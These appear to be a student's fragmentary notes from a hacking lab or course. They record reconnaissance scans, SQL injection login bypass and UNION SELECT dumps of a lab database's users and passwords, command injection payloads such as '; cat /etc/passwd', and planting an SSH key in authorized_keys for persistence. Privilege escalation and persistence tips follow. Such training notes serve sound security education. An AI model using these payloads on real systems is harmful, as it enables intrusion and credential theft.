10.50.21.129 -- intial box do not ping just scan with nmap
nmap --script=http-enum.nse 10.50.21.129
22/tcp open  ssh
80/tcp open  http
| http-enum: 
|   /login.php: Possible admin folder
|   /login.html: Possible admin folder
|   /img/

nikto -h 10.50.21.129
/scripts/

went straight to website 

phishing target :
Charlie Chaplann
CEO, Target Corp Inc
Suite 112
1607 Range Rd
Tampa, FL 33601
CChaplann@UniversalExports.com
PublicAffairs@TargetCorp.com

will read files i upload 
http://10.50.21.129/getcareers.php?myfile=Executive_Assistant.html

can upload here
http://10.50.21.129/apply.html

http://10.50.21.129/login.html 
admin password gives welcome
'OR 1 ='1
'OR 1 ='1
gives welcome aaron 
http://10.50.21.129/login.html 
go back -- you need to have these steps done before submiting the above sql
-- right click : INSPECT ACCESIBILITY PROPERTIES
in the menu that opens at the bottom :: go to network tab
submit credentials / login
click the POST input feild in the menu on the bottom
that opens a new menu hit the REQUEST tab that opens in the new menu
switch to RAW its a toggle icon
copy the entire feild
go to the URL paste it after a question mark
1 (the original) http://10.50.33.78/login.php
2 (add the question mark) http://10.50.33.78/login.php?
3 (final) http://10.50.33.78/login.php?username=TOM%27+OR+1%3D%271&passwd=TOM%27+OR+1%3D%271
test the new credentials

[name] => user2 [pass] => RntyrfVfNER78 [name] => user3 [pass] => Obo4GURRnccyrf 
[name] => Lee_Roth [pass] => anotherpassword4THEages ) 1
====================================================================================================
/scripts/
#!/usr/bin/python3
import os
system_user=user2
user_password=EaglesIsARE78
##Developer note
#script will eventually take above system user credentials and run automated services

user2
EaglesIsARE78

cat /etc/hosts
192.168.28.181 WebAp
for i in {1..254}; do (ping -c 1 192.168.28.$i | grep "bytes from" &); done
64 bytes from 192.168.28.172: icmp_seq=1 ttl=63 time=0.981 ms
64 bytes from 192.168.28.181: icmp_seq=1 ttl=63 time=0.602 ms
64 bytes from 192.168.28.190: icmp_seq=1 ttl=64 time=0.129 ms
p

http://127.0.0.1:1113/pick.php?product=7%20UNION%20SELECT%201,2,3
1 	3 	$2

UNION SELECT table_schema,table_name,column_name from information_schema.columns # 


siteusers 	id 	$customer
siteusers 	name 	$customer
siteusers 	account 	$customer
siteusers 	category 	$customer
siteusers 	description 	$customer
1 	123558 	$Lockheed Martin
2 	14744 	$Boeing
3 	117 	$General Dynamics
4 	33699 	$Northrop Grumman
5 	55487 	$ManTech International



siteusers 	id 	$purchase_history
siteusers 	quantity 	$purchase_history
siteusers 	product 	$purchase_history
siteusers 	account 	$purchase_history
siteusers 	id 	$shippingdates
siteusers 	ordernumber 	$shippingdates
siteusers 	account 	$shippingdates
siteusers 	date 	$shippingdates

siteusers 	user_id 	$users
siteusers 	name 	$users
siteusers 	username 	$users

Aaron 	Aaron 	$1
user2 	user2 	$2
user3 	user3 	$3
Lee_Roth 	Lroth 	$4
Aaron 	ncnffjbeqlCn$$jbeq 	$1 apasswordyPa$$word
user2 	RntyrfVfNER78 	$2 EaglesIsARE78
user3 	Obo4GURRnccyrf 	$3 Bob4THEEapples



Lroth 	anotherpassword4THEages 	$4


192.168.28.179







===========================================================================================
no tunnel to box 

nmap -Pn -sT -T4 -- script=http.enum

firefox to ip 


open all links then get info on them 

look at /etc/hosts and /etc/passwd first 

www-data user2 looking for nologin and sh but not false 

authetication bypass ' or 1='1 in both 

rot13 and base 64 

test every option evenif you find one that works for the 
input fields look for the diffrenet one 
pay attention to how which feild is rendered ie strings and integers 

dirty ping the subnet of the ip from each box 

pay attention to the documents saying if you need to test creditials / gain access/ enumerate the system 

makea format like this tomorrow for the sql tabel 

siteusers
    custumer
        id
        name
        ahdajfh
    net_produ
        jjdashf
        jdjbvabvj





10.50.35.223
XK91Yhj3aSHUaTe
----------------------------------------------------------------------------------------

recon ping nmap nc 
http-enum 
open every link 
/etc/passwd to find a users home directorty 
command injectable 
where that users key is 
post and get method 

if you find the sql server the credntials are there FIND THEM
UNION SELECT ? 1,2,3 

modify golden statement 
product ? 7 or 1 
user databases are at the bottom 

graph the data base 
test every field dont just use the first on that works 

auditpol need to privledge escelate 
crontab
follow pids and parent pids 
run file and strings 
run it binary analaysis gidraha right clcick transfer to binaary 


if x >> 4 =32 bit shifting programming mode 
0000 0000 0000
0000 0010 0000 this is 32
0010 0000 0000 this is 512 
512 bit shifted to the right 4 times is 32 

if x / 4 =32 x= 32*4 

-------------------------------------------------------------------------------------

windows persistence 

the run keys use the os feild guide 

services and scheduled task if something is misconfigured Google chrome is an example
chrome should be capitilized 

dll hijacking 
its set to automatic in the services you need to reboot

------------------------------------------------------------------------------------

linux persistance 
sudo -l 
ps -elf 
net stat -antp 
ls 
use the find command from os 
/home fror usr home dir
suid guid commands 
gtfo bins 

======================================================================================

windows exploit development 

do it on th box 
gdb steps 




https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,13)&input=T2JvNEdVUlJuY2N5cmY
https://phoenixnap.com/kb/how-to-list-display-view-all-cron-jobs-linux
https://wiremask.eu/tools/buffer-overflow-pattern-generator/
https://gtfobins.github.io/gtfobins/find/#sudo


disass 
go all the way down in disass 
=====================================================================================

use the full key when you do the rsa key 
click and read all the questions 
=========================================================================================

### Application on the server is vulnerable,
### allowing execution of arbitrary commands
### User input not validated
### Common example is a SOHO router, with a web page to allow ping
SPECIFY ABSOLUTE PATH EVERYTIME WHILE DOING THIS DO NOT CD 
system("ping -c 1 ".$_GET["ip"]);
###  ^^^contain the following in it’s code
HOW DID WE GET TO THE COMMAND INJECTION ??!!?? we used the robots.txt 
ALWAYS TRY ; whoami 

### Run the following to chain/stack our arbitrary command
; cat /etc/passwd


### find the user you are currently 

pwd 
ls -al

### RSA tokens are hardware devices or software applications that generate a unique code to authenticate a user's access to a network service, server, VPN, or email

; mkdir /var/www/.ssh 

### bellow is done from terminal 

ls -al 

ls ../../../../../../..s
ssh-keygen -t rsa -b 4096 ### if your ssh file is empty when it asks you for a password just hit enter 

cat ../../.ssh/id_rsa.pub
 ## copy the contents ##
ls -la ../../.ssh/


##back to the command injection site 

; echo "(paste ==student@lin-ops)">>/var/www/.ssh/authorized_keys ##not the actual conents drop everything between the () in stead us the past content 

### attempt to ssh to the webserver 

ssh www-data@ 
============================================================================================

